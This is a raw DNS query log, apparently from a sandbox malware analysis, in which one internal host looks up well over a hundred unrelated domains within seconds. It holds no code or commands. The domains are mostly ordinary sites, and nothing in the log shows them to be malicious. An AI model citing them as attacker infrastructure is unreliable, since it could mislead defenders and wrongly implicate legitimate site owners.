                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.856817007 CEST192.168.2.68.8.8.80x2b2Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.971028090 CEST192.168.2.6198.32.64.120x40Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.587701082 CEST192.168.2.68.8.8.80x269cStandard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.593689919 CEST192.168.2.68.8.8.80xcf7eStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.691386938 CEST192.168.2.68.8.8.80x24Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.838828087 CEST192.168.2.68.8.8.80x62c3Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.841063976 CEST192.168.2.68.8.8.80xef6aStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.841583967 CEST192.168.2.68.8.8.80xb3e7Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.844290972 CEST192.168.2.68.8.8.80xc33bStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.844290972 CEST192.168.2.68.8.8.80x63dcStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.847930908 CEST192.168.2.68.8.8.80xbb60Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.896923065 CEST192.168.2.68.8.8.80x97daStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.919805050 CEST192.168.2.68.8.8.80xfacfStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.953845024 CEST192.168.2.68.8.8.80x8c20Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:35.997184038 CEST192.168.2.68.8.8.80x6995Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.069963932 CEST192.168.2.68.8.8.80x7329Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.229649067 CEST192.168.2.68.8.8.80x124dStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.312136889 CEST192.168.2.68.8.8.80x1f6aStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.320149899 CEST192.168.2.68.8.8.80x4b19Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.737313986 CEST192.168.2.68.8.8.80xefb6Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.740616083 CEST192.168.2.68.8.8.80xa47dStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.749907017 CEST192.168.2.68.8.8.80x7455Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.823398113 CEST192.168.2.68.8.8.80x646eStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.865058899 CEST192.168.2.68.8.8.80x6c55Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.876564980 CEST192.168.2.68.8.8.80x1d5fStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:36.999054909 CEST192.168.2.68.8.8.80xabe2Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.005217075 CEST192.168.2.68.8.8.80xa951Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.185019970 CEST192.168.2.68.8.8.80x2693Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.417351961 CEST192.168.2.68.8.8.80xc76dStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.463570118 CEST192.168.2.68.8.8.80xc9b7Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.465838909 CEST192.168.2.68.8.8.80x891eStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.555742025 CEST192.168.2.68.8.8.80x6e2dStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.633018017 CEST192.168.2.68.8.8.80x547Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.683000088 CEST192.168.2.68.8.8.80x200Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:37.969726086 CEST192.168.2.68.8.8.80xfdd9Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.156744003 CEST192.168.2.68.8.8.80x5b73Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.221208096 CEST192.168.2.68.8.8.80x2693Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.314460039 CEST192.168.2.68.8.8.80x707cStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.329274893 CEST192.168.2.68.8.8.80x22b1Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.442485094 CEST192.168.2.68.8.8.80x7a58Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.444993973 CEST192.168.2.68.8.8.80xca3bStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.478789091 CEST192.168.2.68.8.8.80x4a92Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.579165936 CEST192.168.2.68.8.8.80x6aeeStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.622750998 CEST192.168.2.68.8.8.80x404cStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.686546087 CEST192.168.2.68.8.8.80xdd9bStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:38.691313982 CEST192.168.2.68.8.8.80xed8fStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.080571890 CEST192.168.2.68.8.8.80x9bfcStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.183192968 CEST192.168.2.68.8.8.80xb072Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.188946962 CEST192.168.2.68.8.8.80xbfc8Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.244076014 CEST192.168.2.68.8.8.80x2693Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.318325996 CEST192.168.2.68.8.8.80x3fcaStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.436171055 CEST192.168.2.68.8.8.80x892fStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.442048073 CEST192.168.2.68.8.8.80x9c8Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.496201992 CEST192.168.2.68.8.8.80xbde6Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.557374001 CEST192.168.2.68.8.8.80xde8eStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:39.997263908 CEST192.168.2.6192.36.148.170x96Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.033710957 CEST192.168.2.6198.41.0.40x6bStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.051228046 CEST192.168.2.6202.12.27.330x73Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.116767883 CEST192.168.2.68.8.8.80x9bfcStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.243853092 CEST192.168.2.68.8.8.80xee6aStandard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.343617916 CEST192.168.2.68.8.8.80xf691Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.343874931 CEST192.168.2.68.8.8.80x7521Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.414525032 CEST192.168.2.6198.41.0.40x1eStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.494813919 CEST192.168.2.68.8.8.80x7c00Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.576158047 CEST192.168.2.68.8.8.80x9f47Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:40.598071098 CEST192.168.2.68.8.8.80xd75eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.011277914 CEST192.168.2.68.8.8.80x32aStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.028198957 CEST192.168.2.68.8.8.80x7e52Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.179579973 CEST192.168.2.68.8.8.80x84e7Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.180759907 CEST192.168.2.68.8.8.80x1e8aStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.180759907 CEST192.168.2.68.8.8.80x762fStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.181828022 CEST192.168.2.68.8.8.80x90b0Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.182065010 CEST192.168.2.68.8.8.80x2cf6Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.183629036 CEST192.168.2.68.8.8.80x4b66Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.183629990 CEST192.168.2.68.8.8.80xe184Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.184314013 CEST192.168.2.68.8.8.80xe1e1Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.186634064 CEST192.168.2.68.8.8.80x84deStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.189335108 CEST192.168.2.68.8.8.80x13e7Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.189335108 CEST192.168.2.68.8.8.80xb994Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.190073967 CEST192.168.2.68.8.8.80x5d48Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.190073967 CEST192.168.2.68.8.8.80x25b8Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.191550970 CEST192.168.2.68.8.8.80xf430Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.193564892 CEST192.168.2.68.8.8.80xc8f4Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.194993019 CEST192.168.2.68.8.8.80xdd4cStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.222121954 CEST192.168.2.68.8.8.80x1e35Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.222121954 CEST192.168.2.68.8.8.80x9775Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.224029064 CEST192.168.2.68.8.8.80x8b5fStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.224093914 CEST192.168.2.68.8.8.80x67ceStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.225359917 CEST192.168.2.68.8.8.80x89c6Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.226555109 CEST192.168.2.68.8.8.80x4f1dStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.226733923 CEST192.168.2.68.8.8.80x3cb9Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.227561951 CEST192.168.2.68.8.8.80x3ebaStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.270199060 CEST192.168.2.68.8.8.80x49a9Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.276002884 CEST192.168.2.68.8.8.80xcbd4Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.276002884 CEST192.168.2.68.8.8.80xf4bbStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.281291962 CEST192.168.2.68.8.8.80xa88cStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.281488895 CEST192.168.2.68.8.8.80x3928Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.283962011 CEST192.168.2.68.8.8.80x2693Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.292416096 CEST192.168.2.68.8.8.80xf30dStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.362050056 CEST192.168.2.68.8.8.80x6d04Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.363217115 CEST192.168.2.68.8.8.80x4556Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.363217115 CEST192.168.2.68.8.8.80x6d21Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.364487886 CEST192.168.2.68.8.8.80x818Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.365057945 CEST192.168.2.68.8.8.80x67a1Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.596812010 CEST192.168.2.68.8.8.80xef04Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.600039959 CEST192.168.2.68.8.8.80x2aa4Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.625720024 CEST192.168.2.68.8.8.80xb43aStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.694308996 CEST192.168.2.68.8.8.80xf6feStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.704055071 CEST192.168.2.68.8.8.80x70d7Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.706267118 CEST192.168.2.68.8.8.80xfa7bStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.738280058 CEST192.168.2.68.8.8.80xd03dStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.748431921 CEST192.168.2.68.8.8.80x2c6dStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.766271114 CEST192.168.2.68.8.8.80x839aStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.775533915 CEST192.168.2.68.8.8.80xaa12Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.779045105 CEST192.168.2.68.8.8.80x9f14Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.782897949 CEST192.168.2.68.8.8.80x215fStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.787029028 CEST192.168.2.68.8.8.80xdb2bStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.814338923 CEST192.168.2.68.8.8.80x720eStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.840044022 CEST192.168.2.68.8.8.80xa5d0Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.927226067 CEST192.168.2.68.8.8.80xbe82Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.932332039 CEST192.168.2.68.8.8.80x6a0Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.984056950 CEST192.168.2.68.8.8.80x5917Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.986787081 CEST192.168.2.68.8.8.80x1dd1Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.990495920 CEST192.168.2.68.8.8.80x522aStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.995102882 CEST192.168.2.68.8.8.80x840cStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.007056952 CEST192.168.2.68.8.8.80x2eb0Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.022020102 CEST192.168.2.68.8.8.80xc7bdStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.069509029 CEST192.168.2.68.8.8.80x6965Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.070518017 CEST192.168.2.68.8.8.80xe468Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.072000027 CEST192.168.2.68.8.8.80x5e6cStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.090981007 CEST192.168.2.68.8.8.80x1bbeStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.104228020 CEST192.168.2.68.8.8.80xc2a8Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.105618000 CEST192.168.2.68.8.8.80x234dStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.105948925 CEST192.168.2.68.8.8.80xaa1fStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.107961893 CEST192.168.2.68.8.8.80x44eStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.108016014 CEST192.168.2.68.8.8.80xee41Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.109747887 CEST192.168.2.68.8.8.80x84f4Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.125291109 CEST192.168.2.68.8.8.80x71d6Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.139899015 CEST192.168.2.68.8.8.80xdeddStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.149347067 CEST192.168.2.68.8.8.80x5169Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.191035032 CEST192.168.2.68.8.8.80x6293Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.194549084 CEST192.168.2.68.8.8.80x222Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.197158098 CEST192.168.2.68.8.8.80xfdc4Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.199649096 CEST192.168.2.68.8.8.80xab88Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.201843977 CEST192.168.2.68.8.8.80xc338Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.203079939 CEST192.168.2.68.8.8.80x1697Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.204513073 CEST192.168.2.68.8.8.80x11e7Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.207618952 CEST192.168.2.68.8.8.80xa0b3Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.208791018 CEST192.168.2.68.8.8.80x70bStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.210311890 CEST192.168.2.68.8.8.80x125eStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.212188959 CEST192.168.2.68.8.8.80xb9e8Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.216723919 CEST192.168.2.68.8.8.80xb5f3Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.218008995 CEST192.168.2.68.8.8.80x6679Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.220381021 CEST192.168.2.68.8.8.80x9812Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.220751047 CEST192.168.2.68.8.8.80x159bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.222316027 CEST192.168.2.68.8.8.80xea0dStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.223850012 CEST192.168.2.68.8.8.80xd7f0Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.226720095 CEST192.168.2.68.8.8.80x7eaStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.241137028 CEST192.168.2.68.8.8.80xb7bStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.248682022 CEST192.168.2.68.8.8.80x9669Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.253911972 CEST192.168.2.68.8.8.80x6b58Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.292723894 CEST192.168.2.68.8.8.80xdd4cStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.322664976 CEST192.168.2.68.8.8.80x4b9dStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.322664976 CEST192.168.2.68.8.8.80x4d2bStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.326086044 CEST192.168.2.68.8.8.80xcc72Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.332545042 CEST192.168.2.68.8.8.80xb44bStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.332545042 CEST192.168.2.68.8.8.80xff85Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.370091915 CEST192.168.2.68.8.8.80xab96Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.370870113 CEST192.168.2.68.8.8.80xb281Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.371010065 CEST192.168.2.68.8.8.80x1e78Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.387027025 CEST192.168.2.68.8.8.80xf30dStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.436218977 CEST192.168.2.68.8.8.80xa15aStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.439994097 CEST192.168.2.68.8.8.80x9834Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.441431999 CEST192.168.2.68.8.8.80xa88cStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
